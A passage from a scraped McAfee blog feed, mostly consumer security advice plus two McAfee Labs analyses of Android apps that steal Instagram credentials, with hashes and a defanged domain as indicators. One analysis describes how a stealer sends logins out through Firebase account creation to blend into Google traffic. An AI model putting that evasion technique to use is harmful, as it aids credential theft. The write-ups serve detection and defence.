  3. Leverage financial restoration options to fix your damaged credit score and make your pocketbook whole again through cyber breach insurance. 

It’s Never Been More Important to Offer a Digital Wellness Solution as an Employee Benefit 

Great benefits that have real meaning for employees are key to helping retain and acquire amazing talent.  Providing an all-in-one and easy-to-use Digital Wellness solution designed to safeguard against compromised devices, privacy leaks, identity theft and other frustrating, time-consuming issues not only provides peace of mind for employees but also directly – and positively, impacts a company’s bottom line.  Choosing a trusted cyber protection solution like McAfee for your Digital Wellness benefit will give your employees a brand they love and your company the advantage of 30+ years of experience protecting people from digital threats.   

For more information on McAfee Digital Wellness, visit www.mcafee.com/employee-benefits-info or send an email to EmployeeBenefits@McAfee.com.  

Footnotes –  

  1. Capgemini and Efma, World Retail Banking Report 2021 
  2. 2021 McAfee Consumer Research Emerging Tech Trends Survey, December 2021 
  3. McAfee’s 2020 Holiday Season: State of Today’s Digital e-Shopper survey 
  4. PWC December 2021 Global Consumer Insights Pulse Survey 
  5. Statistics on Remote Workers that Will Surprise You – May 11, 2022
  6. Gartner CFO Survey 2020 
  7. The Hill. “FBI seeks spike in cybercrime reports during coronavirus pandemic.” April 2020 
  8. Zdnet.com – “Three billion phishing emails are sent every day. But one change could make life much harder for scammers” March 2021
  9. TechJury- “How Many Cyber Attacks Happen Per Day in 2022?” May 2022 
  10. 4. WCNC Charlotte – “How strong is your password? A professional hacker says probably not strong enough” June 2021 
  11. IBM – Work from Home Study, 2020 
  12. The Wall Street Journal. “Human Error Often the Culprit in Cloud Data Breaches.” August 2019 
  13. Gartner. “Designing Security for Remote-Work First Enterprises” 
  14. Wall Street Journal “Cyber Daily: Cyber Insurance Became Much Pricier in 2021” May 2022 
  15. The Economist – “How to protect yourself against the theft of your identity

The post McAfee’s Digital Wellness Delivers Online Protection As An Employee Benefit appeared first on McAfee Blog.

]]>
Instagram credentials Stealers: Free Followers or Free Likes https://www.mcafee.com/blogs/other-blogs/mcafee-labs/instagram-credentials-stealers-free-followers-or-free-likes/ Fri, 10 Jun 2022 17:14:41 +0000 https://www.mcafee.com/blogs/?p=154582

Authored by Dexter Shin  Instagram has become a platform with over a billion monthly active users. Many of Instagram’s users...

The post Instagram credentials Stealers: Free Followers or Free Likes appeared first on McAfee Blog.

]]>

Authored by Dexter Shin 

Instagram has become a platform with over a billion monthly active users. Many of Instagram’s users are looking to increase their follower numbers, as this has become a symbol of a person’s popularity.  Instagram’s large user base has not gone unnoticed to cybercriminals. McAfee’s Mobile Research Team recently found new Android malware disguised in an app to increase Instagram followers. 

How can you increase your followers or likes? 

You can easily find apps on the internet that increase the number of Instagram followers. Some of these apps require both a user account and a password. Other types of apps only need the user to input their user account. But are these apps safe to use? 

Figure 1. Suspicious apps in Google Images 
Figure 1. Suspicious apps in Google Images

Many YouTubers explain how to use these apps with tutorial videos. They log into the app with their own account and show that the number of followers is increasing. Among the many videos, the domain that appears repeatedly was identified. 

The way the domain introduces is very simple. 

  1. Log in with user account and password. 
  2. Check credentials via Instagram API. 
  3. After logging in, the user can enjoy many features provided by the app. (free followers, free likes, unlimited comments, etc.) 
  4. In the case of free followers, the user needs to input how many followers they want to gain.  
Figure 2. A screenshot to increase the number of followers by entering in 20 followers.
Figure 2. A screenshot to increase the number of followers by entering in 20 followers.

When you run the function, you can see that the number of followers increases every few seconds. 

Figure 3. New follower notifications appear in the feed.
Figure 3. New follower notifications appear in the feed.

How does this malware spread? 

Some Telegram channels are promoting YouTube videos with domain links to the malware. 

Figure 4. Message being promoted on Telegram
Figure 4. Message being promoted on Telegram

We have also observed a video from a famous YouTuber with over 190,000 subscribers promoting a malicious app. However, in the video, we found some concerning comments with people complaining that their credentials were being stolen. 

Figure 5. Many people complain that their Instagram accounts are being compromised

Behavior Analysis in Malware 

We analyzed the application that is being promoted by the domain. The hidden malware does not require many permissions and therefore does not appear to be harmful. When users launch the app, they can only see the below website via the Android Webview.  

Figure 6. Redirect to malicious website via Android Webview

After inspecting the app, we observe the initial code does not contain many features. After showing an advertisement, it will immediately show the malicious website. Malicious activities are performed at the website’s backend rather than within the Android app. 

Figure 7. Simple 2 lines of initial code
Figure 7. Simple 2 lines of initial code

The website says that your transactions are carried out using the Instagram API system with your username and password. It is secure because they use the user’s credentials via Instagram’s official server, not their remote server. 

Contrary to many people’s expectations, we received abnormal login attempts from Turkey a few minutes after using the app. The device logged into the account was not an Instagram server but a personal device model of Huawei as LON-L29. 

Figure 8. Abnormal login attempt notification
Figure 8. Abnormal login attempt notification

As shown above, they don’t use an Instagram API. In addition, as you request followers, the number of the following also increases. In other words, the credentials you provided are used to increase the number of followers of other requesters. Everyone who uses this app has a relationship with each other. Moreover, they will store and use your credentials in their database without your acknowledgement. 

How many users are affected? 

The languages of most communication channels were English, Portuguese, and Hindi. Especially, Hindi was the most common, and most videos had more than 100 views. In the case of a famous YouTuber’s video, they have recorded more than 2,400 views. In addition, our test account had 400 followers in one day. It means that at least 400 users have sent credentials to the malware author. 

Conclusion 

As we mentioned in the opening remarks, many Instagram users want to increase their followers and likes. Unfortunately, attackers are also aware of the desires of these users and use that to attack them. 

Therefore, users who want to install these apps should consider that their credentials may be leaked. In addition, there may be secondary attacks such as credential stuffing (=use of a stolen username and password pairs on another website). Aside from the above cases, there are many unanalyzed similar apps on the Internet. You shouldn’t use suspicious apps to get followers and likes. 

McAfee Mobile Security detects this threat as Android/InstaStealer and protects you from this malware. For more information, visit McAfee Mobile Security. 

Indicators of Compromise 

SHA256: 

  • e292fe54dc15091723aba17abd9b73f647c2d24bba2a671160f02bdd8698ade2 
  • 6f032baa1a6f002fe0d6cf9cecdf7723884c635046efe829bfdf6780472d3907 

Domains: 

  • https[://]insfreefollower.com 

The post Instagram credentials Stealers: Free Followers or Free Likes appeared first on McAfee Blog.

]]>
Instagram credentials Stealer: Disguised as Mod App https://www.mcafee.com/blogs/other-blogs/mcafee-labs/instagram-credentials-stealer-disguised-as-mod-app/ Fri, 10 Jun 2022 17:13:41 +0000 https://www.mcafee.com/blogs/?p=154766

Authored by Dexter Shin  McAfee’s Mobile Research Team introduced a new Android malware targeting Instagram users who want to increase...

The post Instagram credentials Stealer: Disguised as Mod App appeared first on McAfee Blog.

]]>

Authored by Dexter Shin 

McAfee’s Mobile Research Team introduced a new Android malware targeting Instagram users who want to increase their followers or likes in the last post. As we researched more about this threat, we found another malware type that uses different technical methods to steal user’s credentials. The target is users who are not satisfied with the default functions provided by Instagram. Various Instagram modification application already exists for those users on the Internet. The new malware we found pretends to be a popular mod app and steals Instagram credentials. 

Behavior analysis 

Instander is one of the famous Instagram modification applications available for Android devices to help Instagram users access extra helpful features. The mod app supports uploading high-quality images and downloading posted photos and videos. 

The initial screens of this malware and Instander are similar, as shown below. 

Figure 1. Instander legitimate app(Left) and Mmalware(Right) 

Next, this malware requests an account (username or email) and password. Finally, this malware displays an error message regardless of whether the login information is correct. 

Figure 2. Malware requests account and password 

The malware steals the user’s username and password in a very unique way. The main trick is to use the Firebase API. First, the user input value is combined with l@gmail.com. This value and static password(=kamalw20051) are then sent via the Firebase API, createUserWithEmailAndPassword. And next, the password process is the same. After receiving the user’s account and password input, this malware will request it twice. 

Figure 3. Main method to use Firebase API
Figure 3. Main method to use Firebase API

Since we cannot see the dashboard of the malware author, we tested it using the same API. As a result, we checked the user input value in plain text on the dashboard. 

Figure 4. Firebase dashboard built for testing
Figure 4. Firebase dashboard built for testing

According to the Firebase document, createUserWithEmailAndPassword API is to create a new user account associated with the specified email address and password. Because the first parameter is defined as email patterns, the malware author uses the above code to create email patterns regardless of user input values. 

It is an API for creating accounts in the Firebase so that the administrator can check the account name in the Firebase dashboard. The victim’s account and password have been requested as Firebase account name, so it should be seen as plain text without hashing or masking. 

Network traffic 

As an interesting point on the network traffic of the malware, this malware communicates with the Firebase server in Protobuf format in the network. The initial configuration of this Firebase API uses the JSON format. Although the Protobuf format is readable enough, it can be assumed that this malware author intentionally attempts to obfuscate the network traffic through the additional settings. Also, the domain used for data transfer(=www.googleapis.com) is managed by Google. Because it is a domain that is too common and not dangerous, many network filtering and firewall solutions do not detect it. 

Conclusion 

As mentioned, users should always be careful about installing 3rd party apps. Aside from the types of malware we’ve introduced so far, attackers are trying to steal users’ credentials in a variety of ways. Therefore, you should employ security software on your mobile devices and always keep up to date. 

Fortunately, McAfee Mobile Security is able to detect this as Android/InstaStealer and protect you from similar threats. For more information visit  McAfee Mobile Security 

Indicators of Compromise 

SHA256: 

  • 238a040fc53ba1f27c77943be88167d23ed502495fd83f501004356efdc22a39 

The post Instagram credentials Stealer: Disguised as Mod App appeared first on McAfee Blog.

]]>
6 Tips to Help Your Balance Your Children’s Summer Screentime https://www.mcafee.com/blogs/tips-tricks/6-tips-to-help-your-balance-your-childrens-summer-screentime/ Wed, 08 Jun 2022 17:47:11 +0000 https://www.mcafee.com/blogs/?p=154907

The pandemic forced many parents into screentime management Bootcamp. We learned quickly that more hours at home require more intention...

The post 6 Tips to Help Your Balance Your Children’s Summer Screentime appeared first on McAfee Blog.

]]>

The pandemic forced many parents into screentime management Bootcamp. We learned quickly that more hours at home require more intention in managing family technology. The exact purpose holds true for summer. Before things get too crazy—vacations, camps, and a revolving door of friends—a priority might be putting a screentime plan in place.  

Add to the summer equation that many parents are still on remote or hybrid work schedules, and the need for a summer screentime plan becomes even more important.

But first, what’s the cost of just winging it with screentime this summer? Doing so could harm your child both emotionally and physically. According to the American Academy of Pediatrics (AAP), children spend an average of seven hours a day on entertainment media, such as televisions, computers, phones, and other electronic devices. Now that summer is here, we can assume that number will increase.

Balancing your child’s screentime is also a safety issue. As the summer ticks on, boredom can lead to more time online, which can open the door to threats such as cyberbullying, self-esteem and body issues, risky behavior, and connecting with strangers.

Keep in mind that every family’s summer screentime balance plan will be different depending on family schedules and children’s ages. Not sure where to begin? The AAP has an excellent, customizable Media Plan that includes a Screen Time Calculator. The guide will help you design a plan based on the ages of each child in your family.  

6 Tips to Help You Balance Screentime

  1. Inventory Activities and Discuss Limits. Bring the whole family into the screen time discussion. What does an average day look like in your home? What activities can each person dream up outside of television, gaming, or social media? Where are the daily windows where consistent family time can happen? What kind of limits would be ideal? Discuss ways to keep one another accountable and a fun way to track success and consequences.  
  2. Have plenty of non-screen activities ready.  One way to keep kids off their screens, is  offering them interesting options that outrank what’s happening on their devices. Consider, as a family, creating a list of at-home and on-the-go activities. Consider a trip to the lake, the beach, or a local museum. You might learn a new craft or pick a home project to complete (a bedroom makeover) together. Maybe try your hand at making pasta from scratch or growing your own vegetables. Activities don’t have to be pricey; often, simple is better. Whatever your list contains, remember: An idea is a dream without a real plan and taking real time to make it happen. 
  3. Know where they go, what they see. As you know, at McAfee, we are front-line advocates of family filtering software. The content your kids consume this summer matters. Understanding the social networks and apps your kids frequent is key to keeping them safe this summer. The time and effort you spend establishing screen limits don’t matter much if the content your child views isn’t age-appropriate. A few questions to help assess content: 
    1. Is the content age-appropriate? Are the apps my child uses interactive and learning-based or mind-numbing, or even risky? 
    2. Do my family’s technology habits require filtering software to help block inappropriate websites? 
    3. Are the privacy settings on social media and gaming accounts set to restrict what strangers can see and who can send a direct message to my child?
  4. Maintain a device curfew. Just because it’s summer, doesn’t mean anything goes. Consider keeping many of the same device rules in place. A device curfew in the summer months is more critical since kids like to take their devices to bed and scroll or text into the wee hours.    
  5. Make sure they know why. This is a step some parents unintentionally may skip. Even if you find yourself repeating the ‘why’ of screen limits to your kids, make sure they understand you aren’t being random with the rules. Let them know that it’s a proven reality (studies show) that excessive screentime has an array of emotional and physical consequences that you aren’t willing to allow into your family. 
  6. Step into their world.  Have you ever thought of picking up that game controller and playing your child’s favorite game with them? It’s a simple gesture that could build amazing bridges. Not only could it help you understand their digital routines and communities, but it would also open the door for consistent online safety discussions. If your child spends most of their time on TikTok or Snapchat, ask them to show you around the apps. Be teachable and open to their favorite online activities. (One of my personal mottos is that as a parent I must make every effort to be teachable if I expect my kids to be reachable)!

One mom on Facebook recently shared a powerful reminder that, as parents, we only have 18 summers with our kids before—poof—they are grown. She also shared an inspiring visual reminder. She keeps a clear jar with each of her children’s names on it in plain view. Inside each jar, she places 18 colorful tiny pom-poms. She subtracts one pom pom each year on their birthday. As the pom poms visually decrease, it reminds her to make the most of her time with each child. Here’s hoping your summer is packed with less screentime and more moments that make each pom pom count. 

The post 6 Tips to Help Your Balance Your Children’s Summer Screentime appeared first on McAfee Blog.

]]>
How to Know If Your Mobile Finance Apps Are Safe https://www.mcafee.com/blogs/tips-tricks/how-to-know-if-your-mobile-finance-apps-are-safe/ Wed, 08 Jun 2022 13:14:21 +0000 https://www.mcafee.com/blogs/?p=150743

Mobile banking and finance apps have become increasingly popular in recent years. These apps provide a quick and convenient way...

The post How to Know If Your Mobile Finance Apps Are Safe appeared first on McAfee Blog.

]]>

Mobile banking and finance apps have become increasingly popular in recent years. These apps provide a quick and convenient way to see checking and savings account balances and make and receive payments.  

It’s no surprise that many people use these third-party apps to manage their finances. In 2021, the U.S. saw 573.1 million finance app downloads, a 19% increase from the previous year. 

However, despite its benefits, mobile banking isn’t immune to risks. This article will discuss the safety and security of mobile finance apps and give you a few pointers to protect yourself while using these apps. 

Is mobile banking safe?

Yes, mobile banking is a pretty safe way to manage your finances; however, there can still be some risks associated with it, including fraud and scams 

If you’re careful, there are plenty of ways to protect yourself while using this incredibly easy banking method. 

6 tips to improve mobile finance app security

Here are a few tips to help you improve the safety of your online financial accounts. 

Ensure you’re downloading the official app

A bank’s website will often include links to their mobile apps that provide related mobile banking services, along with details about the app’s features and how users can use it. You should use a trusted platform when installing the app, like the App Store for iPhone or iOS users or the Google Play Store for Android users.  

You should also take time to go through reviews and related information about the app before downloading it to ensure its legitimacy. If you have any doubts, clarify the issue with your bank before downloading what could be a fake banking app. 

Set a strong password 

While this may seem obvious, the reality is that many people don’t pay enough attention to their passwords. To create a strong password, you should use a combination of uppercase and lowercase letters, numbers, and special characters in no particular order or pattern.  

In addition, security experts recommend long, complex passwords to exponentially increase the time it takes to crack them. It also helps to have unique passwords for each of your accounts.  

If you’re concerned about remembering and managing multiple passwords, you can use a reputable and secure password manager like McAfee True Key to store your passwords.  

Use two-factor authentication when possible

Many services nowadays offer two-factor or multifactor authentication. This function refers to the additional layers of security against hackers. On top of a traditional username-password login, users are required to identify themselves with a code that’s sent to their cellphone or email. 

By confirming the user’s identity this way, organizations eliminate a degree of uncertainty. While it isn’t foolproof, two-factor or multifactor authentication helps increase security. It’s worth checking if your finance app offers this feature. 

Avoid public Wi-Fi when using finance apps

Public Wi-Fi networks are convenient in urgent situations; however, they often come with a warning saying the network is unsecured. This means that the network is unencrypted, making it easy for hackers to access your personal information. The best practice is to avoid using public Wi-Fi networks, especially when carrying out any form of financial transaction.  

If you need to make purchases or send and receive money while on the move, though, you’ll want to consider a virtual private network (VPN) like McAfee Secure VPN. The VPN provides a secure network even when using public Wi-Fi by hiding your IP address and encrypting your data. 

Get email/text alerts for potential fraud

The easiest way to protect your finances is to keep a vigilant eye on all of your transactions. However, security notifications from your bank are a great added measure. Most credit card companies allow you to turn on transaction alerts for various services, such as balance transfer requests, international purchases, and exceeded credit limits, which can help you recognize any suspicious activity on your account.  

It’s also important to remember that financial institutions will never contact you over the phone or through email to ask for your banking information. If you receive such a message, it’s most certainly a scam. A common way people get duped is through calls or emails claiming they’ve won a prize and need to share personal account details to receive the money. Never share your bank account details, passwords, or one-time codes with strangers.  

Always check with your bank to confirm any activity that seems out of the ordinary. In addition to alert notifications, banks can also send helpful tips to protect your account against fraud. 

Use McAfee Security for Mobile

McAfee Security for Mobile is an award-winning cybersecurity tool that helps address the issues mentioned above and more. It’ll scan your device for malware, suspicious websites, and unsecured Wi-Fi networks so you can use social media or shop online with complete peace of mind.  

It also comes with other features, like system cleaning services that clean junk from your phone’s storage. These features can boost battery life and help locate your phone if it’s ever stolen or misplaced.  

Are mobile banking apps as safe as online banking?

Mobile and online banking both have their benefits and drawbacks, but which is the safer option? Experts often have varied opinions on the matter.  

Some people believe it might be easier to download malware on a computer unknowingly, as it’s tricky to judge the authenticity of a website or malicious links. Users typically download apps from reputed app stores when using mobile devices, which lowers the risk. 

On the other hand, professionals believe that both methods are equally safe. The choice depends on the network available to the user, as private networks are significantly less susceptible to hacking than public ones. Some users may prefer computers to mobile phones simply because they find it easier to perform tasks on a bigger screen. 

See how McAfee Security for Mobile keeps your device safe

Both internet and mobile banking are convenient and offer a quick way to manage your personal finances, as you don’t have to travel to a physical bank or carry large amounts of cash in your wallet.  

However, while mobile banking is generally considered a safe method of managing your finances, it can have some vulnerabilities that scammers may try to take advantage of. 

Following the tips mentioned above — like using a private network, not sharing personal details with anyone, and using a comprehensive mobile security tool like McAfee Security for Mobile — can make all the difference.  

The tool’s security features include safe browsing, a secure VPN, and antivirus software. This means you can use your mobile finance apps confidently knowing McAfee is looking out for you. 

The post How to Know If Your Mobile Finance Apps Are Safe appeared first on McAfee Blog.

]]>
8 Ways to Know If Online Stores Are Safe and Legit https://www.mcafee.com/blogs/tips-tricks/8-ways-to-know-if-online-stores-are-safe-and-legit/ Wed, 08 Jun 2022 13:07:00 +0000 https://www.mcafee.com/blogs/?p=150737

The explosion of e-commerce sites has changed how we shop today, providing access to millions of online stores with almost...

The post 8 Ways to Know If Online Stores Are Safe and Legit appeared first on McAfee Blog.

]]>

The explosion of e-commerce sites has changed how we shop today, providing access to millions of online stores with almost unlimited selections.  

Just as you would take basic precautions in a brick-and-mortar store — perhaps hiding your PIN number while paying and making sure the business is legitimate — you should also practice safe shopping habits online. 

Here are eight ways you can avoid fake websites and other online scams and ensure that you’re dealing with legitimate companies and safe online stores. 

Use the free McAfee WebAdvisor to check for safe sites

One of the best ways to tell if an online store is legit and avoid debit and credit card scams, domain name and subdomain name takeovers, and other problems is with a free and effective download like McAfee WebAdvisor. 

This smart tool helps you surf and shop with confidence, protecting you from malicious sites that can contain:  

  • Adware: Pop-ups that might be infected with malware 
  • Spyware: Software downloaded without the user’s consent, perhaps passing on sensitive personal information to advertisers or cybercriminals. 
  • Viruses: Pieces of code that can copy themselves and typically have a negative effect, such as slowing down your system or destroying data 
  • Phishing scams: When hackers send duplicitous emails designed to trick people into falling for a scam to reveal financial information, system credentials, or other sensitive data 

McAfee WebAdvisor is a free browser extension that downloads quickly and installs easily, working in the background automatically to protect you from malware and phishing as you surf, search, and enjoy online shopping. 

McAfee WebAdvisor works with Windows 10, 8.1, 8, and 7 (32- and 64-bit) computers and is compatible with these browsers: 

  • Internet Explorer 10.0 or later 
  • Microsoft Edge (Chromium-based) 
  • Microsoft Edge (Windows 10 only; Fall Creators Update required) 
  • Mozilla Firefox 
  • Google Chrome 

Here are other ways to make sure you know when you’re dealing with scammers online.  

Check the padlock in the address bar

When checking an e-commerce site’s credentials, start with the address bar. Often, hackers will use URLs that are very close to the real site’s URL but not quite the same. Look for typos or use Google to see if a search takes you to the same page. Also, look for a padlock icon in the address bar. 

Click the padlock and look at the drop-down menu that provides information, such as if the site has a valid certificate like SSL (verifying that the web address belongs to the company), how many cookies are in use, other site settings, and whether your information is safe when sent to this site. 

The protection is pretty good but not perfect since some cybercriminals have been able to replicate these padlocks or take over legitimate sites that have them. 

Verify the website’s trust seal

Trust seals, such as the TrustedSite certification, are stamps created by a certificate authority (CA) to confirm the legitimacy of a site. A trust seal tells visitors that they are on a safe site and the company that displays the mark prioritizes cybersecurity. Click on it, and you should be taken to a webpage that verifies the authenticity of the trust seal. 

Use the Google Transparency Report

Google’s Safe Browsing technology crawls through billions of web addresses every day on the lookout for unsafe websites. The technology discovers thousands daily — often legitimate sites that have been compromised. Warnings for unsafe sites pop up in your browser and on the Google search engine. You can also search specific URLs to see if a site has been compromised.  

Check the company’s social media presence

It’s worth checking a company on social media to see if they appear to have a genuine following and legitimate posts. The Better Business Bureau (BBB) also has suggestions for spotting fake social media accounts, including those on LinkedIn, Facebook, Twitter, and Instagram. You should look for: 

  • Accounts with poor or no content and stock or recycled images 
  • Poor engagement with followers 
  • Lack of transparency about who runs the account 
  • Phony reviews 
  • Links to phishing scams and malware 

Review the company’s contact info

Another way to test the legitimacy of an online retail store is to check its contact information. Does it have a physical address, phone number, and email contact? Does the email address on the contact page have the company domain name in it, or is it generic (like a Gmail address)? If you send an email, does it get delivered? 

Analyze the overall look of the website

Check to see if the e-commerce site looks as if it has been professionally produced or whether it has been thrown together with slapdash results. Are there typos, grammar errors, poor-quality images, and a sloppy design? Does it have a poorly worded return policy or no return policy at all?  

All the things that undermine the professional appearance and authenticity of a site should be red flags and convince you that you’re on a scam website 

Verify if there are company reviews

If the online company is a legitimate website (not a scam site) and has been around for a while, there should be authentic third-party reviews from previous customers. Review sites include Google My Business, Amazon, and Yelp. 

If the reviews are uniformly bad, on the other hand, you have another type of problem to confront. 

See how McAfee WebAdvisor can keep you safe while shopping online

Since virtual shopping is fast becoming the new norm, it’s important to guard against cybercriminals that are increasingly targeting retailers and their customers. A great way to shop with confidence is to use McAfee WebAdvisor, which is available as a free download. 

The web browser extension works tirelessly in the background to protect you as you browse and buy. Think of it as a gift to yourself so you can use the internet to its full potential while keeping your information protected. 

The post 8 Ways to Know If Online Stores Are Safe and Legit appeared first on McAfee Blog.

]]>
Wedding Planning App Users Hacked Before the Big Day https://www.mcafee.com/blogs/internet-security/wedding-planning-app-users-hacked-before-the-big-day/ Wed, 08 Jun 2022 13:02:10 +0000 https://www.mcafee.com/blogs/?p=154303

Say you’re getting married. You and your partner have booked the venue, made the seating arrangements, trained your dog to...

The post Wedding Planning App Users Hacked Before the Big Day appeared first on McAfee Blog.

]]>

Say you’re getting married. You and your partner have booked the venue, made the seating arrangements, trained your dog to be the ring bearer – and everything is running smoothly. You’ve used a trusty wedding planning website to make everything a breeze. Nothing could ruin this day for you! Except, there’s an uninvited guest. They’re not crashing the wedding and making an awkward toast, but they’ve crashed into your wedding planning website account and now have access to your information.  

There are many things that could go wrong during wedding planning – some of them out of anyone’s control. Maybe the caterer canceled last minute, or the live band is stuck in traffic. Other things may be easily avoided, but you don’t necessarily see them coming. Like a hacker accessing your wedding website and making fraudulent bank transfers right before your big day. 

The Wedding Crasher 

Zola, a wedding planning site allowing couples to create websites, budgets, and gift registries, confirmed that hackers had managed to access the accounts of some of their users, The Verge reported. Once these accounts were infiltrated, hackers used the linked bank accounts or funds held inside the site to make cash transfers. The main method these cybercriminals used was purchasing gift cards through the user’s account and sending them to their email addresses to avoid being easily traced. 

These criminals did not hack the Zola website itself but hacked their users’ accounts with a method called credential stuffing. This is a strategy where hackers take email and password combinations involved in previous breaches of other websites and use them to log into other online profiles. 

You may not even know that your information had been breached previously and that cybercriminals now had your logins for a number of different accounts. Luckily, there are ways to protect yourself and your information from credential stuffing tactics to stop hackers in their tracks. 

Tell Credential Stuffing to Go Stuff It 

Just because you’ve hypothetically grown up and are ready for lifelong commitments doesn’t mean you’ve outgrown those old trusty email addresses and passwords (hello, “basketball4life23”). There’s a level of nostalgia that comes with using the email account that you made in middle school, or maybe you just haven’t gotten around to changing it. However, keeping those old email addresses and logins are doing you more harm than good. Want to make sure that hackers aren’t able to credential stuff your accounts? Here are some trusty tips to keep your information safe. 

Track down and close old accounts 

The best way to know that your old accounts aren’t coming back to haunt you is to make sure those ancient logins are dead and gone. If you don’t remember all the accounts you’ve made and no longer use, don’t sweat it! There are settings through your internet browser that will show you all the accounts and passwords you have saved. A password manager also keeps track of all your credentials, so you don’t have to wrack your brain to try and remember every account you’ve ever made. Once you’ve gone through all your old online accounts you no longer use, close them for good! Though this step will require some time and patience, it’s always better to put in the effort and know your information is safe than to risk it. 

Create strong and unique passwords 

Only having to remember one password for every account may make logging in easier, but ensuring that each of your accounts is unique and secure is worth the extra effort. Having a strong and unique password for each of your accounts helps protect them from credential stuffing and other threats. Varying your passwords across online accounts will assure you that if one of them is breached, the others will remain safe. A password manager can also help with this step, because many of them, such as True Key, can generate strong, random, and unique passwords for every account. 

Update credentials when necessary 

Keep an eye out to make sure that if a website or company you have an account with is breached, you are updating your credentials so that hackers can’t access them. If you see that there has been a hack and your information is vulnerable, immediately update your logins and passwords on that account to keep yourself safe. 

Use multifactor authentication 

Using multifactor authentication adds an extra layer of protection to your accounts. This safety measure requires more than one method of identity verification to access the account, helping to prevent criminals from gaining access to your password-protected information.   

Don’t let cybercriminals get the jump on you! Take the necessary steps to protect your accounts and your personal information. Though combing through your old accounts and deleting them or coming up with a new and unique password for every site login isn’t a glamourous activity, you’ll enjoy greater peace of mind that your accounts are safe, leaving you free to enjoy life’s best moments.  

The post Wedding Planning App Users Hacked Before the Big Day appeared first on McAfee Blog.

]]>
How to Recognize an Online Scammer https://www.mcafee.com/blogs/tips-tricks/how-to-recognize-an-online-scammer/ Wed, 08 Jun 2022 12:45:41 +0000 https://www.mcafee.com/blogs/?p=150729

The great thing about the internet is that there’s room for everyone. The not-so-great part? There’s plenty of room for...

The post How to Recognize an Online Scammer appeared first on McAfee Blog.

]]>

The great thing about the internet is that there’s room for everyone. The not-so-great part? There’s plenty of room for cybercriminals who are hungry to get their hands on our personal information.  

Fortunately, internet scams don’t have to be a part of your online experience. In this article, we’ll tell you about some of the most common internet schemes and how you can recognize them to keep your identity safe. 

5 tips to help you recognize an online scam

Scams are scary, but you can prevent yourself from falling for one by knowing what to look for. Here are a few tell-tale signs that you’re dealing with a scammer.  

They say you’ve won a huge prize

If you get a message that you’ve won a big sum of cash in a sweepstakes you don’t remember entering, it’s a scam. Scammers may tell you that all you need to do to claim your prize is send them a small fee or give them your banking information.  

When you enter a real sweepstakes or lottery, it’s generally up to you to contact the organizer to claim your prize. Sweepstakes aren’t likely to chase you down to give you money.  

They want you to pay in a certain way

Scammers will often ask you to pay them using gift cards, money orders, cryptocurrency (like Bitcoin), or through a particular money transfer service. Scammers need payments in forms that don’t give consumers protection.  

Gift card payments, for example, are typically not reversible and hard to trace. Legitimate organizations will rarely, if ever, ask you to pay using a specific method, especially gift cards 

When you have to make online payments, it’s a good idea to use a secure service like PayPal. Secure payment systems can have features to keep you safe, like end-to-end encryption.  

They say it’s an emergency

Scammers may try to make you panic by saying you owe money to a government agency and you need to pay them immediately to avoid being arrested. Or the criminal might try to tug at your heartstrings by pretending to be a family member in danger who needs money.  

Criminals want you to pay them or give them your information quickly — before you have a chance to think about it. If someone tries to tell you to pay them immediately in a text message, phone call, or email, they’re likely a scammer 

They say they’re from a government organization or company

Many scammers pretend to be part of government organizations like the Internal Revenue Service (IRS). They’ll claim you owe them money. Criminals can even use technology to make their phone numbers appear legitimate on your caller ID.  

If someone claiming to be part of a government organization contacts you, go to that organization’s official site and find an official support number or email. Contact them to verify the information in the initial message.  

Scammers may also pretend to be businesses, like your utility company. They’ll likely say something to scare you, like your gas will be turned off if you don’t pay them right away. 

The email is littered with grammatical errors

Most legitimate organizations will thoroughly proofread any copy or information they send to consumers. Professional emails are well-written, clear, and error-free. On the other hand, scam emails will likely be full of grammar, spelling, and punctuation errors.  

It might surprise you to know that scammers write sloppy emails on purpose. The idea is that if the reader is attentive enough to spot the grammatical mistakes, they likely won’t fall for the scam 

8 most common online scams to watch out for

There are certain scams that criminals try repeatedly because they’ve worked on so many people. Here are a few of the most common scams you should watch out for.  

Phishing scams

A phishing scam can be a phone or email scam. The criminal sends a message in which they pretend to represent an organization you know. It directs you to a fraud website that collects your sensitive information, like your passwords, Social Security number (SSN), and bank account data. Once the scammer has your personal information, they can use it for personal gain.  

Phishing emails may try anything to get you to click on their fake link. They might claim to be your bank and ask you to log into your account to verify some suspicious activity. Or they could pretend to be a sweepstakes and say you need to fill out a form to claim a large reward.  

During the coronavirus pandemic, new phishing scams have emerged, with scammers claiming to be part of various charities and nonprofits. Sites like Charity Navigator can help you discern real groups from fake ones.  

Travel insurance scams

These scams also became much more prominent during the pandemic. Let’s say you’re preparing to fly to Paris with your family. A scammer sends you a message offering you an insurance policy on any travel plans you might be making. They’ll claim the policy will compensate you if your travel plans fall through for any reason without any extra charges.  

You think it might be a good idea to purchase this type of insurance. Right before leaving for your trip, you have to cancel your plans. You go to collect your insurance money only to realize the insurance company doesn’t exist.  

Real travel insurance from a licensed business generally won’t cover foreseeable events (like travel advisories, government turmoil, or pandemics) unless you buy a Cancel for Any Reason (CFAR) addendum for your policy.  

Grandparent scams

Grandparent scams prey on your instinct to protect your family. The scammer will call or send an email pretending to be a family member in some sort of emergency who needs you to wire them money. The scammer may beg you to act right away and avoid sharing their situation with any other family members. 

For example, the scammer might call and say they’re your grandchild who’s been arrested in Mexico and needs money to pay bail. They’ll say they’re in danger and need you to send funds now to save them.  

If you get a call or an email from an alleged family member requesting money, take the time to make sure they’re actually who they say they are. Never wire transfer money right away or over the phone. Ask them a question that only the family member would know and verify their story with the rest of your family.  

Advance fee scam

You get an email from a prince. They’ve recently inherited a huge fortune from a member of their royal family. Now, the prince needs to keep their money in an American bank account to keep it safe. If you let them store their money in your bank account, you’ll be handsomely rewarded. You just need to send them a small fee to get the money.  

There are several versions of this scam, but the prince iteration is a pretty common one. If you get these types of emails, don’t respond or give out your financial information.  

Tech support scams

Your online experience is rudely interrupted when a pop-up appears telling you there’s a huge virus on your computer. You need to “act fast” and contact the support phone number on the screen. If you don’t, all of your important data will be erased.  

When you call the number, a fake tech support worker asks you for remote access to your device to “fix” the problem. If you give the scammer access to your device, they may steal your personal and financial information or install malware. Worse yet, they’ll probably charge you for it.  

These scams can be pretty elaborate. A scam pop-up may even appear to be from a reputable software company. If you see this type of pop-up, don’t respond to it. Instead, try restarting or turning off your device. If the device doesn’t start back up, search for the support number for the device manufacturer and contact them directly.  

Formjacking and retail scams

Scammers will often pose as popular e-commerce companies by creating fake websites. The fake webpages might offer huge deals on social media. They’ll also likely have a URL close to the real business’s URL but slightly different. 

